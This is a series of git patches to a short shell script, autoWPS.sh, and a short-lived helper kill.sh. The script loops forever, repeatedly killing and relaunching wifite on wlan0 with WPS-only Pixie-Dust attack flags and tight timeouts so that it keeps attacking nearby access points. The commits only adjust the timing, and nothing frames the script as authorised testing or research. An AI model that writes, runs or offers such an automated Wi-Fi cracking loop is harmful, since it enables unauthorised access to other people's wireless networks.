From 461c188d56cb44df35bdf8368ff61fa6c765ad5e Mon Sep 17 00:00:00 2001 From: Danil Date: Mon, 16 Dec 2019 14:08:19 +0200 Subject: [PATCH 1/8] version 2 --- autoWPS.sh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/autoWPS.sh b/autoWPS.sh index b2ce57a..0de4a1c 100644 --- a/autoWPS.sh +++ b/autoWPS.sh @@ -1,6 +1,6 @@ #!/bin/sh while (true) do -sleep 30 && killall wifite & wifite -i wlan0 -p 8 -mac --wps --wps-only --pixie --wps-fails 1 --wps-timeouts 1 --wps-time 8; -sleep 5; +killall wifite; +wifite -i wlan0 -p 5 --wps --wps-only --pixie --wps-fails 1 --wps-timeouts 1 --wps-time 5; done; From 0774e3506753331e3822421b3f64b4837b22a24f Mon Sep 17 00:00:00 2001 From: Danil Date: Mon, 16 Dec 2019 18:17:12 +0200 Subject: [PATCH 2/8] Update autoWPS.sh --- autoWPS.sh | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/autoWPS.sh b/autoWPS.sh index 0de4a1c..94952ad 100644 --- a/autoWPS.sh +++ b/autoWPS.sh @@ -1,6 +1,7 @@ #!/bin/sh while (true) do +#bash kill.sh killall wifite; -wifite -i wlan0 -p 5 --wps --wps-only --pixie --wps-fails 1 --wps-timeouts 1 --wps-time 5; +wifite -i wlan0 -p 5 --wps --wps-only --pixie --wps-fails 1 --wps-timeouts 1 --wps-time 15; done; From bb29f40ac5d5050a924e90cb7972b7689de3bf5a Mon Sep 17 00:00:00 2001 From: Danil Date: Tue, 17 Dec 2019 10:52:46 +0200 Subject: [PATCH 3/8] Create kill.sh --- kill.sh | 1 + 1 file changed, 1 insertion(+) create mode 100644 kill.sh diff --git a/kill.sh b/kill.sh new file mode 100644 index 0000000..776366c --- /dev/null +++ b/kill.sh @@ -0,0 +1 @@ +sleep 50 && killall wifite; From b8a8dce8a04b30a7275edf20cd880030a59aed83 Mon Sep 17 00:00:00 2001 From: Danil Date: Tue, 17 Dec 2019 10:53:06 +0200 Subject: [PATCH 4/8] Update autoWPS.sh --- autoWPS.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/autoWPS.sh b/autoWPS.sh index 94952ad..4d10f25 100644 --- a/autoWPS.sh +++ b/autoWPS.sh @@ -1,7 +1,7 @@ #!/bin/sh while (true) do -#bash kill.sh +bash kill.sh killall wifite; wifite -i wlan0 -p 5 --wps --wps-only --pixie --wps-fails 1 --wps-timeouts 1 --wps-time 15; done; From d909ca0abf3d592ef42524c25857240d5f229f54 Mon Sep 17 00:00:00 2001 From: Danil Date: Sat, 21 Dec 2019 20:33:31 +0200 Subject: [PATCH 5/8] Update autoWPS.sh --- autoWPS.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/autoWPS.sh b/autoWPS.sh index 4d10f25..3e46985 100644 --- a/autoWPS.sh +++ b/autoWPS.sh @@ -1,7 +1,7 @@ #!/bin/sh while (true) do -bash kill.sh +bash kill.sh; killall wifite; wifite -i wlan0 -p 5 --wps --wps-only --pixie --wps-fails 1 --wps-timeouts 1 --wps-time 15; done; From 2eeea90664261b5216f87afa216cff53a2bcf9c6 Mon Sep 17 00:00:00 2001 From: Danil Date: Sat, 21 Dec 2019 20:33:45 +0200 Subject: [PATCH 6/8] Update kill.sh --- kill.sh | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/kill.sh b/kill.sh index 776366c..8697d56 100644 --- a/kill.sh +++ b/kill.sh @@ -1 +1 @@ -sleep 50 && killall wifite; +sleep 50 && killall wifite & From 519e6a7bf2e0ddcb6c358cc33810c24cbee98284 Mon Sep 17 00:00:00 2001 From: Danil Date: Sun, 22 Dec 2019 20:29:40 +0200 Subject: [PATCH 7/8] Delete kill.sh --- kill.sh | 1 - 1 file changed, 1 deletion(-) delete mode 100644 kill.sh diff --git a/kill.sh b/kill.sh deleted file mode 100644 index 8697d56..0000000 --- a/kill.sh +++ /dev/null @@ -1 +0,0 @@ -sleep 50 && killall wifite & From ee5b997a4236c7193b82354d57ff1864b616db3a Mon Sep 17 00:00:00 2001 From: Danil Date: Sun, 22 Dec 2019 20:30:55 +0200 Subject: [PATCH 8/8] Update autoWPS.sh --- autoWPS.sh | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/autoWPS.sh b/autoWPS.sh index 3e46985..ac53b19 100644 --- a/autoWPS.sh +++ b/autoWPS.sh @@ -1,7 +1,7 @@ #!/bin/sh while (true) do -bash kill.sh; killall wifite; -wifite -i wlan0 -p 5 --wps --wps-only --pixie --wps-fails 1 --wps-timeouts 1 --wps-time 15; +wifite -i wlan0 -p 5 --wps --wps-only --pixie --wps-fails 1 --wps-timeouts 1 --wps-time 10; +sleep 1; done;